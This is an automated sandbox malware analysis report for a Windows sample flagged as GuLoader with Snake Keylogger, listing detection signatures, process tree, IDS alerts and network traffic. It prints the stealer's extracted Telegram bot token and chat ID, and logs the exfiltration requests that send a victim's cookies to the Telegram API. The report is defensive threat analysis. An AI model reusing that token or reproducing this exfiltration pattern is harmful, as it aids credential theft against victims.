Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
axN56TZ3PI.exe

Overview

General Information

Sample name:axN56TZ3PI.exe
Analysis ID:1632315
MD5:7cb23ee1dedd35c01d1cf539667d4d99
SHA1:70f8e5fd9d4a78c78eb38e87c5482c763844a6e1
SHA256:6db4fae76289918ad6c528e7d4d8e36484c2694b6e41775b0a3ccc2499f1b1da
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64native
  • axN56TZ3PI.exe (PID: 4624 cmdline: "C:\Users\user\Desktop\axN56TZ3PI.exe" MD5: 7CB23EE1DEDD35C01D1CF539667D4D99)
    • axN56TZ3PI.exe (PID: 8888 cmdline: "C:\Users\user\Desktop\axN56TZ3PI.exe" MD5: 7CB23EE1DEDD35C01D1CF539667D4D99)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7490462916:AAEz89H3J9AylfxjXRLV5diILDx9KkgRSME", "Chat_id": "7160883909", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.6015919161.0000000038091000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    0000000C.00000002.6015919161.00000000381D3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000000.00000002.2039834509.00000000053C9000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: axN56TZ3PI.exe PID: 8888JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: axN56TZ3PI.exe PID: 8888JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T22:28:04.212164+010028033053Unknown Traffic192.168.11.2049725104.21.64.1443TCP
            2025-03-07T22:28:05.253512+010028033053Unknown Traffic192.168.11.2049726104.21.64.1443TCP
            2025-03-07T22:28:06.297982+010028033053Unknown Traffic192.168.11.2049727104.21.64.1443TCP
            2025-03-07T22:28:07.302172+010028033053Unknown Traffic192.168.11.2049728104.21.64.1443TCP
            2025-03-07T22:28:08.314607+010028033053Unknown Traffic192.168.11.2049729104.21.64.1443TCP
            2025-03-07T22:28:09.341806+010028033053Unknown Traffic192.168.11.2049730104.21.64.1443TCP
            2025-03-07T22:28:10.371224+010028033053Unknown Traffic192.168.11.2049731104.21.64.1443TCP
            2025-03-07T22:28:11.438451+010028033053Unknown Traffic192.168.11.2049732104.21.64.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T22:28:01.594269+010028032742Potentially Bad Traffic192.168.11.2049723132.226.8.16980TCP
            2025-03-07T22:28:03.421984+010028032742Potentially Bad Traffic192.168.11.2049723132.226.8.16980TCP
            2025-03-07T22:28:04.531296+010028032742Potentially Bad Traffic192.168.11.2049723132.226.8.16980TCP
            2025-03-07T22:28:05.577894+010028032742Potentially Bad Traffic192.168.11.2049723132.226.8.16980TCP
            2025-03-07T22:28:06.624562+010028032742Potentially Bad Traffic192.168.11.2049723132.226.8.16980TCP
            2025-03-07T22:28:07.624436+010028032742Potentially Bad Traffic192.168.11.2049723132.226.8.16980TCP
            2025-03-07T22:28:08.655253+010028032742Potentially Bad Traffic192.168.11.2049723132.226.8.16980TCP
            2025-03-07T22:28:09.686360+010028032742Potentially Bad Traffic192.168.11.2049723132.226.8.16980TCP
            2025-03-07T22:28:10.717336+010028032742Potentially Bad Traffic192.168.11.2049723132.226.8.16980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T22:27:56.346316+010028032702Potentially Bad Traffic192.168.11.2049721142.251.46.174443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T22:28:19.744276+010018100081Potentially Bad Traffic192.168.11.2049734149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T22:28:12.914209+010018100071Potentially Bad Traffic192.168.11.2049733149.154.167.220443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: axN56TZ3PI.exeAvira: detected
            Found malware configuration
            Source: 0000000C.00000002.6015919161.0000000038091000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7490462916:AAEz89H3J9AylfxjXRLV5diILDx9KkgRSME", "Chat_id": "7160883909", "Version": "4.4"}
            Multi AV Scanner detection for submitted file
            Source: axN56TZ3PI.exeVirustotal: Detection: 65%Perma Link
            Source: axN56TZ3PI.exeReversingLabs: Detection: 57%
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7D1D8 CryptUnprotectData,12_2_37D7D1D8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7D890 CryptUnprotectData,12_2_37D7D890
            Source: axN56TZ3PI.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.11.20:49724 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.251.46.174:443 -> 192.168.11.20:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.191.33:443 -> 192.168.11.20:49722 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49733 version: TLS 1.2
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 0_2_0040264F FindFirstFileA,0_2_0040264F
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 0_2_00405475 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405475
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 0_2_00405E9C FindFirstFileA,FindClose,0_2_00405E9C
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_0040264F FindFirstFileA,12_2_0040264F
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_00405475 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,12_2_00405475
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_00405E9C FindFirstFileA,FindClose,12_2_00405E9C
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 076AEFBDh12_2_076AF00C
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 076AEFBDh12_2_076AEE20
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 076AFB7Fh12_2_076AF8C8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D70D0Dh12_2_37D70B30
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D716F8h12_2_37D70B30
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D72941h12_2_37D72690
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D73080h12_2_37D72C68
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D73080h12_2_37D72FAE
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D7FA1Fh12_2_37D7F778
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_37D70673
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then mov esp, ebp12_2_37D7F4E1
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_37D70853
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_37D70040
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D87437h12_2_37D87190
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8B00Fh12_2_37D8AD40
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8AA23h12_2_37D8A6E8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D86277h12_2_37D85FD0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D84867h12_2_37D845C0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8189Fh12_2_37D815F8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D892A1h12_2_37D88FF8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8C2C6h12_2_37D8BFF8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8788Fh12_2_37D875E8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8E2B6h12_2_37D8DFE8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D89C87h12_2_37D899E0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8F066h12_2_37D8ED98
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8982Fh12_2_37D89588
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D82E57h12_2_37D82BB0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8D076h12_2_37D8CDA8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D81447h12_2_37D811A0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D88E47h12_2_37D88BA0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D829FFh12_2_37D82758
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8DE26h12_2_37D8DB58
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D80FEFh12_2_37D80D48
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D889EFh12_2_37D88748
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8FE16h12_2_37D8FB48
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D85E1Fh12_2_37D85B78
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8440Fh12_2_37D84168
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8BE36h12_2_37D8BB68
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8CBE6h12_2_37D8C918
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D83FB7h12_2_37D83D10
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8EBD6h12_2_37D8E908
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D825A7h12_2_37D82300
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D859C7h12_2_37D85720
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8B9A6h12_2_37D8B6D8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8556Fh12_2_37D852C8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8D996h12_2_37D8D6C8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D80B97h12_2_37D808F0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D88597h12_2_37D882F0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8073Fh12_2_37D80498
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8813Fh12_2_37D87E98
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8A537h12_2_37D8A290
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8C756h12_2_37D8C488
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D83B5Fh12_2_37D838B8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8F986h12_2_37D8F6B8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8214Fh12_2_37D81EA8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D81CF7h12_2_37D81A50
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8B516h12_2_37D8B248
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D802E7h12_2_37D80040
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D87CE7h12_2_37D87A40
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8E746h12_2_37D8E478
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D85117h12_2_37D84E70
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D83707h12_2_37D83460
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D84CBFh12_2_37D84A18
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D832AFh12_2_37D83008
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8A0DFh12_2_37D89E38
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8D506h12_2_37D8D238
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37D8F4F6h12_2_37D8F228
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F664E0h12_2_37F661E8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F67800h12_2_37F67508
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F610BEh12_2_37F60DF0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F68FE8h12_2_37F68CF0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F622C6h12_2_37F61FF8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F6BAF0h12_2_37F6B7F8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F6D2D8h12_2_37F6CFE0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F642B6h12_2_37F63FE8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F6FDE0h12_2_37F6FAE8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F6079Eh12_2_37F604D0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F67CC8h12_2_37F679D0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F6A7D0h12_2_37F6A4D8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F6BFB8h12_2_37F6BCC0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F63996h12_2_37F636C8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F6EAC0h12_2_37F6E7C8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F669A8h12_2_37F666B0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F65986h12_2_37F656B8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F694B0h12_2_37F691B8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F6AC98h12_2_37F6A9A0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F63076h12_2_37F62DA8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F6D7A0h12_2_37F6D4A8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F6EF88h12_2_37F6EC90
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F65066h12_2_37F64D98
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F68190h12_2_37F67E98
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F6154Eh12_2_37F61280
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F69978h12_2_37F69680
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F62756h12_2_37F62488
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F6C480h12_2_37F6C188
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F6DC68h12_2_37F6D970
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F64747h12_2_37F64478
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F66E70h12_2_37F66B78
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F60C2Eh12_2_37F60960
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F68658h12_2_37F68360
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F61E36h12_2_37F61B68
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F6B160h12_2_37F6AE68
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F6C948h12_2_37F6C650
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F63E26h12_2_37F63B58
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F6F450h12_2_37F6F158
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F6030Eh12_2_37F60040
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F67338h12_2_37F67040
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F65EB7h12_2_37F65B48
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F69E40h12_2_37F69B48
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F6B628h12_2_37F6B330
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F63506h12_2_37F63238
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F6E130h12_2_37F6DE38
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F6F918h12_2_37F6F620
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F654F6h12_2_37F65228
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F68B20h12_2_37F68828
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F619B7h12_2_37F61710
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F6A308h12_2_37F6A010
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F62BE6h12_2_37F62918
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F6CE10h12_2_37F6CB18
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F6E5F8h12_2_37F6E300
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 37F64BD6h12_2_37F64908
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 3A3F1B20h12_2_3A3F1828
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 3A3F1190h12_2_3A3F0E98
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 3A3F0339h12_2_3A3F0040
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 3A3F0800h12_2_3A3F0508
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 3A3F1658h12_2_3A3F1360
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then jmp 3A3F0CC8h12_2_3A3F09D0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]12_2_3AAE3F70
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]12_2_3AAE098A
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]12_2_3AAE0AD0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]12_2_3AAE0A18
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]12_2_3AAE3F62

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.11.20:49734 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.11.20:49733 -> 149.154.167.220:443
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2007/03/2025%20/%2016:28:09%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7490462916:AAEz89H3J9AylfxjXRLV5diILDx9KkgRSME/sendDocument?chat_id=7160883909&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5d95116c0067Host: api.telegram.orgContent-Length: 2073
            Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
            Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49723 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49721 -> 142.251.46.174:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49726 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49731 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49728 -> 104.21.64.1:443
